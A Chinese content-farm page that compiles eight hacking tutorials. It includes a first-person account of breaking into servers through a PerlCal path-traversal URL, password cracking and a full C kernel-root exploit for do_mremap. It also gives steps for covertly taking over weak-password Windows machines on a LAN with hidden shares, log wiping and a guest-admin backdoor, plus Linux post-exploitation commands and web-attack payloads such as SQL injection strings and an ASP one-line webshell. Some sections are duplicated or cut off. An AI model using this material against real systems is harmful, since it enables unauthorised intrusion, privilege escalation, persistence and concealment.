欢迎来到千学网!
您现在的位置:首页 > 实用文 > 其他范文

渗透入侵教程分析

时间:2022-06-09 08:18:43 其他范文 收藏本文 下载本文

以下是小编收集整理的渗透入侵教程分析,本文共8篇,仅供参考,欢迎大家阅读。

渗透入侵教程分析

篇1:渗透入侵教程分析

废话不说,开工

C:Documents and SettingsAdministrator>ping www.xxx.com

Pinging www.xxx.com [192.168.0.252] with 32 bytes of data:

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Ping statistics for 192.168.0.252:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

文章中IP为假的 在这里不公布真正IP

看TTL的返回信息判断系统应该不是真的 现在可以改这个

先扫描他看看吧

结果只开了 21 22 80

看来成功率不算打 FTP并没有若口令 80也没什么信息

看来了他站里 发现分有bbs.xxx.com 和 news.xxx.com 而且IP都不一样 看来想办法渗透了。

首先去bbs.xxx.com看看 用的程序似乎是绿盟那样子的 呵呵 似乎没什么漏洞 先放边上。

看看服务器开的端口情况

开了 21 22 80 也没什么漏洞

在看看news.xxx.com

经过扫描 判断服务器应该是 NT/

21 80 389 1002 3389

基本上也没什么漏洞 21 没若口令 这个是IIS的 检查了一便也没什么漏洞 389 也没什么用 3389 不可能有输入法吧登陆看看系统

2000server的

news.xxx.com用的程序是asp的 想到了SQL注入。不过彻底查看了一下 所有的都过滤了。

有点郁闷了

jswz.xxx.com

也是一个分页 不过这个另我非常的意外 用的是cgi的 系统是linux

21 22 80

扫了一下有个漏洞

cal_make.pl 看名字有点熟悉 看了一下 不过一直没想起来

去了国外的几个站 终于发现了~~~

Name : PerlCal

About : cal_make.pl of the PerlCal script. may allow remote users(website visitors) to vIEw any file on a webserver

(dependingon the user the webserver is running on).

Exploit:

_make.pl?“ target=_blank>www.VULNERABLE.com/cgi-bin/cal_make.pl?

p0=../../../../../../../../../../../../etc/passwd

by: stan

呵呵 感谢hack.co.za

在浏览器地址栏输入

_make.pl?p0=../../../../../../../../../../../../../etc/passwd” target=_blank>www.xxx.edu/cgi-bin/perlcal/cal_make.pl?p0=../../../../../../../../../../../../../etc/passwd

好多用户信息 不过这是一个shadow过了passwd 好不容易的机会 不能放弃!

想办法 跑这些用户吧~~~

提炼用户名 希望有弱口令

提炼过程大家参考一些资料去吧

一共20多个用户 跑出来了2个 哈哈,

。~~

用SSH登陆~

权限似乎非常低

用第二个试试

哎 还是一样

看看提升权限吧~~

经过一番折腾 100%确定是rh73 内核Linux kernel 2.4

用do_brk的益出~

#include

#include

#include

char hellc0de[] =

“x69x6ex74x20x67x65x74x75x69x64x28x29x20x7bx20x72x65”

“x74x75x72x6ex20x30x3bx20x7dx0ax69x6ex74x20x67x65x74”

“x65x75x69x64x28x29x20x7bx20x72x65x74x75x72x6ex20x30”

“x3bx20x7dx0ax69x6ex74x20x67x65x74x67x69x64x28x29x20”

“x7bx20x72x65x74x75x72x6ex20x30x3bx20x7dx0ax69x6ex74”

“x20x67x65x74x65x67x69x64x28x29x20x7bx20x72x65x74x75”

“x72x6ex20x30x3bx20x7dx0ax0/bin/sh”;

int main

{

FILE *fp;

char *offset;

fp=fopen(“/tmp/own.c”,“w”);

fprintf(fp,“%s”,hellc0de);

fclose(fp);

system(“gcc -shared -o /tmp/own.so /tmp/own.c;rm /tmp/own.c”);

system(“LD_PRELOAD=/tmp/own.so /bin/sh”);

return 0;

}

郁闷 行不通

想别的办法

试试 do_mremap VMA本地权限提升漏洞

Linux内核中mremap(2)系统调用由于没有对函数返回值进行检查,本地攻击者可以利用这个漏洞获得root用户权限。

mremap系统调用被应用程序用来改变映射区段(VMAs)的边界地址。mremap()系统调用提供对已存在虚拟内存区域调整大小。从VMA区域移动部分虚拟内存到新的区域需要建立一个新的VMA描述符,也就是把由VMA描述的下面的页面表条目(page table entrIEs)从老的区域拷贝到进程页表中新的位置。

要完成这个任务do_mremap代码需要调用do_munmap()内部内核函数去清除在新位置中任何已经存在的内存映射,也就是删除旧的虚拟内存映射。不幸的是代码没有对do_munmap()函数的返回值进行检查,如果可用VMA描述符的最大数已经超出,那么函数调用就可能失败。

:):):)

[1] [2] 下一页

篇2: 的渗透入侵

Kindle's blog

正文

废话不说,

的渗透入侵

。开工

C:Documents and SettingsAdministrator>ping www.xxx.com

Pinging www.xxx.com [192.168.0.252] with 32 bytes of data:

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Reply from 192.168.0.252: bytes=32 time<10ms TTL=128

Ping statistics for 192.168.0.252:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

文章中IP为假的 在这里不公布真正IP

看TTL的返回信息判断系统应该不是真的 现在可以改这个

先扫描他看看吧

结果只开了 21 22 80

看来成功率不算打 FTP并没有若口令 80也没什么信息

看来了他站里 发现分有bbs.xxx.com 和 news.xxx.com 而且IP都不一样 看来想办法渗透了。

首先去bbs.xxx.com看看 用的程序似乎是绿盟那样子的 呵呵 似乎没什么漏洞 先放边上。

看看服务器开的端口情况

开了 21 22 80 也没什么漏洞

在看看news.xxx.com

经过扫描 判断服务器应该是 NT/2000

21 80 389 1002 3389

基本上也没什么漏洞 21 没若口令 这个是IIS的 检查了一便也没什么漏洞 389 也没什么用 3389 不可能有输入法吧登陆看看系统

2000server的

news.xxx.com用的程序是asp的 想到了SQL注入。不过彻底查看了一下 所有的都过滤了。

有点郁闷了

jswz.xxx.com

也是一个分页 不过这个另我非常的意外 用的是cgi的 系统是linux

21 22 80

扫了一下有个漏洞

cal_make.pl 看名字有点熟悉 看了一下 不过一直没想起来

去了国外的几个站 终于发现了~~~

Name : PerlCal

About : cal_make.pl of the PerlCal script. may allow remote users(website visitors) to view any file on a webserver

(dependingon the user the webserver is running on).

Exploit:

_make.pl?“ target=_blank>www.VULNERABLE.com/cgi-bin/cal_make.pl?

p0=../../../../../../../../../../../../etc/passwd%00

by: stan (stan@whizkunde.org)

呵呵 感谢hack.co.za

在浏览器地址栏输入

_make.pl?p0=../../../../../../../../../../../../../etc/passwd%00” target=_blank>www.xxx.edu/cgi-bin/perlcal/cal_make.pl?p0=../../../../../../../../../../../../../etc/passwd%00

好多用户信息 不过这是一个shadow过了passwd 好不容易的机会 不能放弃!

想办法 跑这些用户吧~~~

提炼用户名 希望有弱口令

提炼过程大家参考一些资料去吧

一共20多个用户 跑出来了2个 哈哈。。~~

用SSH登陆~

权限似乎非常低

用第二个试试

哎 还是一样

看看提升权限吧~~

经过一番折腾 100%确定是rh73 内核Linux kernel 2.4

用do_brk的益出~

#include

#include

#include

char hellc0de[] =

“x69x6ex74x20x67x65x74x75x69x64x28x29x20x7bx20x72x65”

“x74x75x72x6ex20x30x3bx20x7dx0ax69x6ex74x20x67x65x74”

“x65x75x69x64x28x29x20x7bx20x72x65x74x75x72x6ex20x30”

“x3bx20x7dx0ax69x6ex74x20x67x65x74x67x69x64x28x29x20”

“x7bx20x72x65x74x75x72x6ex20x30x3bx20x7dx0ax69x6ex74”

“x20x67x65x74x65x67x69x64x28x29x20x7bx20x72x65x74x75”

“x72x6ex20x30x3bx20x7dx0ax0/bin/sh”;

int main()

{

FILE *fp;

char *offset;

fp=fopen(“/tmp/own.c”,“w”);

fprintf(fp,“%s”,hellc0de);

fclose(fp);

system(“gcc -shared -o /tmp/own.so /tmp/own.c;rm /tmp/own.c”);

system(“LD_PRELOAD=/tmp/own.so /bin/sh”);

return 0;

}

郁闷 行不通

想别的办法

试试 do_mremap VMA本地权限提升漏洞

Linux内核中mremap(2)系统调用由于没有对函数返回值进行检查,本地攻击者可以利用这个漏洞获得root用户权限。

mremap系统调用被应用程序用来改变映射区段(VMAs)的边界地址。mremap()系统调用提供对已存在虚拟内存区域调整大小。从VMA区域移动部分虚拟内存到新的区域需要建立一个新的VMA描述符,也就是把由VMA描述的下面的页面表条目(page table entries)从老的区域拷贝到进程页表中新的位置。

要完成这个任务do_mremap代码需要调用do_munmap()内部内核函数去清除在新位置中任何已经存在的内存映射,也就是删除旧的虚拟内存映射。不幸的是代码没有对do_munmap()函数的返回值进行检查,如果可用VMA描述符的最大数已经超出,那么函数调用就可能失败。

:):):)

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#define str(s) #s

#define xstr(s) str(s)

// this is for standard kernels with 3/1 split

#define STARTADDR 0x40000000

#define PGD_SIZE (PAGE_SIZE * 1024)

#define VICTIM (STARTADDR + PGD_SIZE)

#define MMAP_BASE (STARTADDR + 3*PGD_SIZE)

#define DSIGNAL SIGCHLD

#define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)

#define MREMAP_MAYMOVE ( (1UL) << 0 )

#define MREMAP_FIXED ( (1UL) << 1 )

#define __NR_sys_mremap __NR_mremap

// how many ld.so pages? this is the .text section length (like from cat

// /proc/self/maps) in pages

#define LINKERPAGES 0x14

// suid victim

static char *suid=“/bin/ping”;

// shell to start

static char *launch=“/bin/bash”;

_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,

ulong, e);

unsigned long sys_mremap(unsigned long addr, unsigned long old_len,

unsigned long new_len, unsigned long flags,

unsigned long new_addr);

static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;

static int i, pid=0;

static char *env[2], *argv[2];

static ulong ret;

// code to appear inside the suid image

static void suid_code(void)

{

__asm__(

“ call callme n”

// setresuid(0, 0, 0), setresgid(0, 0, 0)

“jumpme: xorl %ebx, %ebx n”

“ xorl %ecx, %ecx n”

“ xorl %edx, %edx n”

“ xorl %eax, %eax n”

“ mov $”xstr(__NR_setresuid)“, %al n”

“ int $0x80 n”

“ mov $”xstr(__NR_setresgid)“, %al n”

“ int $0x80 n”

// execve(launch)

“ popl %ebx n”

“ andl $0xfffff000, %ebx n”

“ xorl %eax, %eax n”

“ pushl %eax n”

“ movl %esp, %edx n”

“ pushl %ebx n”

“ movl %esp, %ecx n”

“ mov $”xstr(__NR_execve)“, %al n”

“ int $0x80 n”

// exit

“ xorl %eax, %eax n”

“ mov $”xstr(__NR_exit)“, %al n”

“ int $0x80 n”

“callme: jmp jumpme n”

);

}

static int suid_code_end(int v)

{

return v+1;

}

static inline void get_esp(void)

{

__asm__(

“ movl %%esp, %%eax n”

“ andl $0xfffff000, %%eax n”

“ movl %%eax, %0 n”

: : “m”(old_esp)

);

}

static inline void cloneme(void)

{

__asm__(

“ pusha n”

“ movl $(”xstr(CLONEFL)“), %%ebx n”

“ movl %%esp, %%ecx n”

“ movl $”xstr(__NR_clone)“, %%eax n”

“ int $0x80 n”

“ movl %%eax, %0 n”

“ popa n”

: : “m”(pid)

);

}

static inline void my_execve(void)

{

__asm__(

“ movl %1, %%ebx n”

“ movl %2, %%ecx n”

“ movl %3, %%edx n”

“ movl $”xstr(__NR_execve)“, %%eax n”

“ int $0x80 n”

: “=a”(ret)

: “m”(suid), “m”(argv), “m”(env)

);

}

static inline void pte_populate(unsigned addr)

{

unsigned r;

char *ptr;

memset((void*)addr, 0x90, PAGE_SIZE);

r = ((unsigned)suid_code_end) - ((unsigned)suid_code);

ptr = (void*) (addr + PAGE_SIZE);

ptr -= r+1;

memcpy(ptr, suid_code, r);

memcpy((void*)addr, launch, strlen(launch)+1);

}

// hit VMA limit & populate PTEs

static void exhaust(void)

{

// mmap PTE donor

t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,

MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

if(MAP_FAILED==t)

goto failed;

// prepare shell code pages

for(i=2; i

pte_populate(victim + PAGE_SIZE*i);

i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);

if(i)

goto failed;

// lock unmap

base = MMAP_BASE;

cnt = 0;

prot = PROT_READ;

printf(“n”); fflush(stdout);

for(;;) {

t = mmap((void*)base, PAGE_SIZE, prot,

MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);

if(MAP_FAILED==t) {

if(ENOMEM==errno)

break;

else

goto failed;

}

if( !(cnt%512) || cnt>65520 )

printf(“r MMAP #%d 0x%.8x - 0x%.8lx”, cnt, base,

base+PAGE_SIZE); fflush(stdout);

base += PAGE_SIZE;

prot ^= PROT_EXEC;

cnt++;

}

// move PTEs & populate page table cache

ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,

MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);

if(-1==ret)

goto failed;

munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);

t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE,

PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0,

0);

if(MAP_FAILED==t)

goto failed;

*t = *((unsigned *)old_esp);

munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));

printf(“n[+] Successnn”); fflush(stdout);

return;

failed:

printf(“n[-] Failedn”); fflush(stdout);

_exit(0);

}

static inline void check_kver(void)

{

static struct utsname un;

int a=0, b=0, c=0, v=0, e=0, n;

uname(&un);

n=sscanf(un.release, “%d.%d.%d”, &a, &b, &c);

if(n!=3 || a!=2) {

printf(“n[-] invalid kernel version stringn”);

_exit(0);

}

if(b==2) {

if(c<=25)

v=1;

}

else if(b==3) {

if(c<=99)

v=1;

}

else if(b==4) {

if(c>18 && c<=24)

v=1, e=1;

else if(c>24)

v=0, e=0;

else

v=1, e=0;

}

else if(b==5 && c<=75)

v=1, e=1;

else if(b==6 && c<=2)

v=1, e=1;

printf(“n[+] kernel %s vulnerable: %s exploitable %s”,

un.release, v? “YES” : “NO”, e? “YES” : “NO” );

fflush(stdout);

if(v && e)

return;

_exit(0);

}

int main(int ac, char **av)

{

// prepare

check_kver();

memset(env, 0, sizeof(env));

memset(argv, 0, sizeof(argv));

if(ac>1) suid=av[1];

if(ac>2) launch=av[2];

argv[0] = suid;

get_esp();

// mmap & clone & execve

exhaust();

cloneme();

if(!pid) {

my_execve();

} else {

waitpid(pid, 0, 0);

}

return 0;

}

耶~~~~成功了

………………………………………………

整理了一些东西 然后看看有什么可以利用的信息没,

呵呵mailuserinfo 看看这里写的什么~

admin e04i9zs8#$%

kelzr zjjjwoai22@

sunzsdk 2z2z2z2z2z2z2z2z

wollf woainiliaoynx

记得主站上有这几个管理员~ 去找登陆的地方

www.xxx.com/login.php

您的IP未被允许登陆

晕了

用SSH登陆192.168.0.252试试

果然登陆进来了 用户名是kelzr 密码是 woainiliaoynx

呵呵 试了2分钟

登陆后发现权限竟然不是root 哭了

试了3个提升权限的竟然没有用

郁闷ING

郁闷中发现一个login的记录 是这个机器登陆另一个机器的记录 密码是明文

登陆的是192.168.0.2 用户名admin 密码mozjkelzlf152@ 是FTP登陆

看来是他估计写下来的

我突然冒出个想法 :)

断开连接 重新用SSH连接主机 root mozjkelzlf152@ 哈哈进来了

有了权限就好办了

我曾经渗透过好多站都是这样 管理员的密码通用 呵呵 一个机组的密码全都一样!

哎~ 大家最好养成一个习惯 尽量避免密码重复

篇3:局域网入侵教程

首先申明:

1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网; 2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了139端口,但没开防火墙的机子, 入侵工具: 一般要用到三个:NTscan变态扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。) 入侵步骤: 1.使用“NTscan变态扫描器”,在IP处填上要扫描的IP范围,选择“WMI扫描”方式,按“开始”后就等扫描结果了。

2.使用“Recton--D贺免杀专用版” 选择“CMD命令”项,在“CMD:”中输入“net share C$=C:”,即可开启远程主机的C盘共享,以此将“C”换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入“对方IPC$”,即可进入对方C盘。 选择“Telnet”项,在“远程主机”中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在“CMD选项”中,执行命令:“net share ipc$”,接着执行:“net share admin$”,最后执行“net use ***.***.***.***IPC$ ”“ /user:administrator”在*处填入你入侵的主机IP。

3.使用“DameWare迷你中文版 4.5”,安装后点“DameWare Mini Remote Control”,在“帮助”项中选择激活产品,输入注册信息,成功注册后,进入“远程连接”窗口,在“主机”处填入IP地址,点“设置”,在“服务安装选项”中点“编辑”后,在“通知对话框”中去掉“连接时通知”,在“附加设置”中全都不选,在“用户选项”中去掉“启用用户选项菜单”。设置完成好后,就可点“连接”,在弹出的对话框中点“确定”后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。 注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份,

入侵步骤补充: 1.在以上第2步中,远程启动Telnet服务可以通过“我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动”完成。

2.Recton--D贺免杀专用版还有其他功能,在“进程”项中,可以查看远程主机的进程,并可任意结束其中进程;在“共享”项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:,D:等,共享好后在地址栏中输入“IPC$”,进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后最好还是把共享给关掉。最后选“日志”,清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。

3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先“telnet IP”,telnet上去,键入y后输入的用户名“administrator”,密码为空, 进入后,开共享用net share命令,共享C$(即C盘):“net share C$=C:”,共享system文件夹:“net share c=c:winntsystem32”,共享IPC$用:“net share IPC$”等,最后是关闭共享,关闭C盘共享:“net share C$ /del”。

4.为方便下次入侵,可以设置后门, 查看用户:“net user”,激活guest用户 “net user guest /active:yes”,更改guest的密码为poco:“net user guest poco”,把guest的权限提升为管理员权限:“net localgroup administrators guest /add”。 5.telnet命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:“”dir d:“,查看C盘program file文件夹:”dir c:PROGRA~1;“,60秒倒记时关机:”shutdown -s -t 60“

篇4:无线网络入侵教程

相信了解无线网络的读者都知道安全性是无线网络的先天不足,正是因为他的传播通过空气,所以信号很容易出现外泄问题,相比有线网络来说信号监听变得非常简单,

无线网络入侵教程

部分用户通过WEP加密的方式来保护网络通讯数据包避免被监听者破译,不过WEP加密在现今这个安全技

篇5:如何入侵XP(xp入侵教程)

最近有好多人都在问如何入侵XP,而且还都在用入侵的老方法对付XP。这是行不通的。 我做了一个总结,看看可以使你对XP有一个清醒的认识,并从中找出一些入侵XP的好的方法,

入侵xp一向来都是很困难,但并不是不能入侵。 只是xp的安全性相对于windows其它糸

篇6:如何入侵博客(博客入侵教程)

漏洞一:数据库下载漏洞 第一步,搜索攻击目标 打开搜索引擎,搜索Pragram by Dlog,可以找到许多博客页面,这些博客都是使用Dlog破废墟修改版建立的,

如何入侵博客(博客入侵教程)

我们要找的叶面是存在暴库漏洞的1.2版本。许多用户都忽视了这个版本中内嵌的eWebEditor在线编辑数据库的

篇7:linux入侵常用命令服务器教程

cat /etc/passwd 查看linux用户cat /etc/shadow 查看用户密码需要root权限

cat /etc/passwd 查看linux用户

cat /etc/shadow 查看用户密码需要root权限

cat /etc/sysconfig/network-scripts/ifcfg-ethn  N代表网卡号 查看所在网卡的ip信息

ifconfig 查看本机ip信息

cat /etc/resolv.conf 查看DNS信息

bash -i 在反弹的shell中使用可以直观显示命令

bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt,当你以Root登陆时,你的prompt会变成

bash#。

系统变量 : 试着echo ”$USER / $EUID“ 系统应该会告诉你它认为你是什么用户。

echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,

vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!

netstat -an grep LISTEN grep :80 查看端口

service --status-all grep running

service --status-all grep http

查看运行服务

lsb_release -a  查看系统版本

重启ssh服务 :/usr/sbin/sshd stop

/usr/sbin/sshd start

ssd_config文件里

PasswordAuthentication no,

将其改为

PasswordAuthentication yes

远程ssh才可登录

否则显示Access denied

其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.

su的菜鸟用法

先chomod 777 /etc/passwd

然后修改bin用户的gid和uid为0

然后passwd设置bin的密码

然后cp /bin/bash /sbin/nologin

然后su的时候su - bin就可以到rootshell了,

这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法

还可以这样

sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd

gcc prtcl2.c –o local –static –Wall

echo ”nosec:x:0:0::/:/bin/sh“ >> /etc/passwd

echo ”nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

清空last记录 cp /dev/null /var/log/wtmp

-----

dd if=/dev/zero f=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的。

篇8:网站教程了解网站入侵的常用方法

首先,观察指定网站,

入侵指定网站是需要条件的:

要先观察这个网站是动态还是静态的。

首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点

如果是静态的(.htm或html),一般是不会成功的。

如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。

以下是入侵网站常用方法:

1.上传漏洞

如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!

有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

2.注入漏洞

字符过滤不严造成的

3.暴库:把二级目录中间的/换成%5c

4.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:

’or’’=’ ” or “a”=”a ’) or (’a’=’a “) or (“a”=”a or 1=1– ’ or ’a’=’a

5.社会工程学。这个我们都知道吧。就是猜解。

6.写入ASP格式数据库。就是一句话木马〈%execute request(“value”)%〉 (数据库必需得是ASP或ASA的后缀)

7.源码利用:一些网站用的都是网上下载的源码.有的站长很懒.什么也不改.

比如:默认数据库,默认后台地址,默认管理员帐号密码等

8.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.

/Databackup/dvbbs7.MDB

s/Databackup/dvbbs7.MDB

s/Data/dvbbs7.MDB

/data/dvbbs7.mdb

s/diy.asp

/diy.asp

s/cmd.asp

s/cmd.exe

s/s-u.exe

srvu.exe

工具:网站猎手 挖掘鸡 明小子

9.查看目录法:一些网站可以断开目录,可以访问目录,

210.37.95.65 images

10.工具溢出

11.搜索引擎利用:

(1).inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/

(2).找网站的管理后台地址:

site:xxxx.comintext:管理

site:xxxx.comintitle:管理 〈关键字很多,自已找〉

site:xxxx.cominurl:login

(3).查找access的数据库,mssql、mysql的连接文件

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

12.COOKIE诈骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。

13.利用常见的漏洞:如动网BBS

可以先用:dvbbs权限提升工具,使自已成为前台管理员。

THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包

这个我就不做了,网上教程多的是,自已下个看看。

工具:dvbbs权限提升工具 动网固顶贴工具

14.还有一些老漏洞。如IIS3,4的查看源码,5的Delete

CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途。

手把手教你入侵

网络入侵详解 第

Linux入侵响应案例

渗透法制教育演讲稿

渗透法制教育教案

渗透bct/angel

德育渗透教案

用Excel做数据分析―描述统计EXCEL基本教程

机械制图简明教程(12.4)-产品设计制图实例分析

用Excel做数据分析―直方图EXCEL基本教程

《渗透入侵教程分析(推荐8篇).doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

文档为doc格式

点击下载本文文档